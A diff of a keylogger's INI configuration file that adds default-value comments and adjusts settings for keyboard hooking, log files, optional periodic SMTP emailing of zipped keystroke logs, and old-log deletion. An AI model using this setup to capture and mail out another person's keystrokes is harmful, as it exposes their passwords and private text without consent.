@@ -1,81 +1,118 @@
 [general]
 
-# set dirname to the full path of directory where you want logs to be written
+# Set dirname to the full path of directory where you want logs to be written.
+# default: C:\Temp\logdir
 dirName=C:\Temp\logdir
 
 # Log keyboard input
+# default: True
 hookKeyboard=True
 
-# add linefeed [\\n] character when carriage return [\\r] character is detected (for Notepad compatibility)
+# Add linefeed [\\n] character when carriage return [\\r] character is detected (for Notepad compatibility)
+# default: False
 addLineFeed=False
 
-# translate backspace chacarter into printable string
+# Translate backspace chacarter into printable string
+# default: False
 parseBackspace=False
 
-# translate escape chacarter into printable string
+# Translate escape chacarter into printable string
+# default: False
 parseEscape=False
 
-# specify the key to press to exit keylogger (hint: to disable key, just set to a nonexistent key)
+# Specify the key to press to exit keylogger (hint: to disable key, just set to a nonexistent key)
+# default: F12
 exitKey=F12
 
-# specify the key to press to flush write buffer to file (hint: to disable key, just set to a nonexistent key. buffer will still be flushed automatically.)
+# Specify the key to press to flush write buffer to file (hint: to disable key, just set to a nonexistent key. buffer will still be flushed automatically.)
+# default: F11
 flushKey=F11
 
-#specify one or more applications by full path name whose input will not be logged. separate multiple applications with semicolon ";".
+# Specify one or more applications by full path name whose input will not be logged. separate multiple applications with semicolon ";".
+# Leave as "None" to log all applications.
+# default: None
 noLog=None
 
-# log all output to one file (filename specified here), inside directory specified with dirName, rather than to multiple files.
-# leave as "None" to let logging take place to multiple files
+# Log all output to one file (filename specified here), inside directory specified with dirName, rather than to multiple files.
+# Leave as "None" to let logging take place to multiple files
+# default: None
 oneFile=None
 
-# specify the time interval between buffer autoflush events, in seconds. (used to be "interval")
+# Specify the time interval between buffer autoflush events, in seconds. 
+# default: 120
 flushInterval=120
 
-# log all output, plus some debug output, to a systemlog file (filename specified here), inside directory specified with dirName
-systemLog=systemlog.txt
+# Log some debug/informational output, to a systemlog file (filename specified here), inside directory specified with dirName
+# Set to None to disable
+# default: None
+systemLog=None
 
 [email]
 
 # Set to True to enable automatic periodic emails of a zipped archive of logfiles
+# default: False
 smtpSendEmail=False
 
 # Set to True if your smtp server requires a login with username/password
+# default: True
 smtpNeedsLogin=True
 
 # Set to your username (only needed if your smtp server requires a login)
+# default: yourusername
 smtpUsername=yourusername
 
 # Set to your password (only needed if your smtp server requires a password)
+# default: yourpassword
 smtpPassword=yourpassword
 
 # Set to the hostname of your smtp server
+# default: your.smtp.server
 smtpServer=your.smtp.server
 
 # Set to the email address that you want to appear in the "From" line in your email
+# default: yourfromaddress@host.com
 smtpFrom=yourfromaddress@host.com
 
 # Set to the email address that you want to appear in the "To" line in your email. Separate multiple addresses semicolon ";".
+# default: yourtoaddress@host.com
 smtpTo=yourtoaddress@host.com
 
 # Set to the text you want to appear in the Subject line in your email
+# default: Automatic Logfile Email
 smtpSubject=Automatic Logfile Email
 
 # Set to the text that you want to appear in the message body of your email
+# default: Please see attached zipfile.
 smtpMessageBody=Please see attached zipfile.
 
-# Specify the time interval between automatic log email events, in minutes (default of 4 hours = 240min)
-emailInterval=240
+# Specify the time interval between automatic log email events, in hours. 
+# default: 4.0
+emailInterval=4.0
 
-# specify the filename for the zip archive that will be emailed to you
+# Specify the filename for the zip archive that will be emailed to you
+# default: logzip.zip
 zipArchiveName=logzip.zip
 
 [logmaintenance]
 
 # Set to True to enable automatic deletion of old logs
+# default: False
 deleteOldLogs=False
 
-# Set to the maximum age of the logs that you want to keep, in days. Logs older than this will be deleted. (default of 2 days)
+# Set to the maximum age of the logs that you want to keep, in days. Logs older than this will be deleted.
+# default: 2.0
 maxLogAge=2.0
 
-# Set to the frequency of checking for and deleting logs older than maxLogAge, in hours. (default 2 hours)
-ageCheckInterval=2
+# Set to the frequency of checking for and deleting logs older than maxLogAge, in hours. 
+# default: 2.0
+ageCheckInterval=2.0
+
+[timestamp]
+
+# Set this to True to enable periodic timestamps in the logfiles
+# default: True
+timestampEnable=True
+
+# Set this to time interval (in minutes) between the timestamps
+# default: 30.0
+timestampInterval=30.0
